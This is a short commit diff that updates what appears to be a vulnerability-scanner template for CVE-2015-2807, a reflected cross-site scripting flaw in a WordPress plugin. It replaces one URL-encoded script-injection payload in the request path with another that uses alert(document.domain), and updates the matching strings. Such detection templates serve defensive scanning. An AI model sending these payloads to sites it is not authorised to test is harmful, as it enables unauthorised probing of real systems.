Update CVE-2015-2807.yaml

patch-1
Prince Chaddha 2021-08-04 14:07:35 +05:30 committed by GitHub
parent 1d888e8b4e
commit ca92425071
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -12,13 +12,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%22%3Ealert(%22xss%22)%3C/script%3E%3Cscript%20src=%22"
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '">alert("xss")</script><script src="'
- '</script><script>alert(document.domain)</script>'
part: body
- type: word